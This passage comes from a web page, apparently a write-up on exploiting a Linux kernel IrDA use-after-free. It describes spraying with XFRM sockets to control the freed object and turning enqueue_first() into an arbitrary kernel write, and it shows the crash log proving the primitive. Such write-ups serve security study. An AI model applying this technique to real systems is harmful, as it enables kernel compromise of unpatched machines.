class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">q_hash<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* Must be able to cast a (void *) *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-16\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p>Our target is taking control of q_next and q_prev, which is a good read\/write primitive through irias_insert_object() Most of known techniques i.e : sendm(m)sg, msgsnd(), add_key() will not work in our case, sendmsg\/msgsnd require a well crafted header, add_key() frees the payload when it finishes and corrupt our payload with a freelist pointer and zeros the payload since this commit : 57070c850a03ee0cea654fc22cb8032fc3139d39)<\/p>\n<p>Luckily, XFRM socket gives us a good primitive to make a consistent spray and controlling the top of our target object, Once we control the freed object, we have a write primitive to any kernel address.<\/p>\n<p>enqueue_first() is responsible for inserting a new object into the queue, since we are controlling the previous queued object, we can write a pointer (with controlled data) to any kernel memory as shown below :<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f356016731601\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> static void enqueue_first(irda_queue_t **queue, irda_queue_t* element)  {  \u2026  } else {   \/*   * Queue is not empty. Insert element into front of queue.   *\/   element-&gt;q_next = (*queue);   (*queue)-&gt;q_prev-&gt;q_next = element; &lt;\u2014\u2014 here : mov QWORD PTR [rdx],rbx element-&gt;q_prev = (*queue)-&gt;q_prev;   (*queue)-&gt;q_prev = element;   (*queue) = element;   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f356016731601-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f356016731601-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f356016731601-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f356016731601-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f356016731601-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f356016731601-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f356016731601-13\">13<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-1\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">enqueue_first<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">irda_queue_t *<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_queue_t*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-3\">\u2026<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-4\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/*<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-6\"><span class=\"crayon-c\"> * Queue is not empty. Insert element into front of queue.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-7\"><span class=\"crayon-c\"> *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_next<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_next<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span>\u2014\u2014<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">here<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">rbx <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">queue<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">element<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f356016731601-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f356016731601-13\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p>Here is the output:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f35a338338997\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ 3.899179] BUG: unable to handle kernel paging request at 00000000deadbeef  [ 3.900038] IP: hashbin_insert+0x99\/0x150  [ 3.900038] PGD 235eab067  [ 3.900038] PUD 0  [ 3.900038]  [ 3.900038] Oops: 0002 [#1] SMP  [ 3.900038] Modules linked in:  [ 3.900038] CPU: 0 PID: 1036 Comm: xx Not tainted 4.10.0-rc8+ #6  [ 3.900038] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04\/01\/2014  [ 3.900038] task: ffff880234993ac0 task.stack: ffffc90001694000  [ 3.900038] RIP: 0010:hashbin_insert+0x99\/0x150  [ 3.900038] RSP: 0018:ffffc90001697dc0 EFLAGS: 00010082  [ 3.900038] RAX: ffff880235f08318 RBX: ffff880235e73120 RCX: 0000000000000000  [ 3.900038] RDX: 00000000deadbeef RSI: ffff880235585be9 RDI: ffff880235e73131  [ 3.900038] RBP: ffffc90001697df0 R08: ffff88023fc1aaa0 R09: ffff8802349fa680  [ 3.900038] R10: ffff880235fab420 R11: ffff880234993ac0 R12: ffff880235f08300  [ 3.900038] R13: 0000000000000202 R14: 0000000000000003 R15: 0000000000000063  [ 3.900038] FS: 0000000001d30880(0000) GS:ffff88023fc00000(0000) knlGS:0000000000000000  [ 3.900038] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  [ 3.900038] CR2: 00000000deadbeef CR3: 0000000235ea3000 CR4: 00000000000006f0  [ 3.900038] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  [ 3.900038] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  [ 3.900038] Call Trace:  [ 3.900038] irias_insert_object+0x19\/0x20  [ 3.900038] irda_bind+0x17a\/0x1c0  [ 3.900038] ? security_socket_bind+0x3e\/0x60  [ 3.900038] SYSC_bind+0xb0\/0xe0  [ 3.900038] ? vfs_write+0x155\/0x1b0  [ 3.900038] ? do_nanosleep+0x56\/0xf0  [ 3.900038] ? SyS_write+0x41\/0xa0  [ 3.900038] SyS_bind+0x9\/0x10  [ 3.900038] entry_SYSCALL_64_fastpath+0x13\/0x94  [ 3.900038] RIP: 0033:0x44a117  [ 3.900038] RSP: 002b:00007ffdb85d5f58 EFLAGS: 00000287 ORIG_RAX: 0000000000000031  [ 3.900038] RAX: ffffffffffffffda RBX: 00000000006b68d8 RCX: 000000000044a117  [ 3.900038] RDX: 0000000000000024 RSI: 00007ffdb85d5f90 RDI: 0000000000000006  [ 3.900038] RBP: 0000000000000070 R08: 000000000048eb5a R09: 000000000000000c  [ 3.900038] R10: 0000000000000000 R11: 0000000000000287 R12: 00000000006b6880  [ 3.900038] R13: 0000000000000065 R14: 00000000006b68d8 R15: 0000000000000000  [ 3.900038] Code: 8d 7b 10 ba 20 00 00 00 48 89 ce e8 42 bf af ff 49 63 c6 49 8d 04 c4 48 8b 50 10 48 85 d2 74 6e 48 89 13 48 8b 50 10 48 8b 52 08 &lt;48&gt; 89 1a 48 8b 50 10 48 8b 52 08 48 89 53 08 48 8b 50 10 48 89  [ 3.900038] RIP: hashbin_insert+0x99\/0x150 RSP: ffffc90001697dc0  [ 3.900038] CR2: 00000000deadbeef  [ 3.900038] &#8212;[ end trace 8a8070c4e016c09c ]&#8212;  [ 3.900038] Kernel panic &#8211; not syncing: Fatal exception  [ 3.900038] Kernel Offset: disabled  [ 3.900038] Rebooting in 1 seconds..    (gdb) x\/i hashbin_insert+0x99  0xffffffff81847839 &lt;hashbin_insert+153&gt;: mov QWORD PTR [rdx],rbx<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f35a338338997-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f35a338338997-49\">49<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-1\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.899179<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BUG<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">unable <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle <\/span><span class=\"crayon-e\">kernel <\/span><span class=\"crayon-e\">paging <\/span><span class=\"crayon-e\">request <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-2\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-3\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PGD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">235eab067<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-4\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PUD<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-5\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-6\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Oops<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0002<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-p\">#1] SMP<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-7\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Modules <\/span><span class=\"crayon-e\">linked <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-8\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CPU<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1036<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Comm<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">xx <\/span><span class=\"crayon-st\">Not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tainted<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4.10.0<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rc8<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#6<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-9\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hardware <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">QEMU <\/span><span class=\"crayon-e\">Standard <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i440FX<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PIIX<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1996<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BIOS <\/span><span class=\"crayon-v\">Ubuntu<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1.8.2<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1ubuntu1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2014<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-10\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880234993ac0 <\/span><span class=\"crayon-v\">task<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stack<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001694000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-11\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0010<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-12\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0018<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffffc90001697dc0 <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00010082<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-13\"><span class=\"crayon-sy\">[<\/span><span 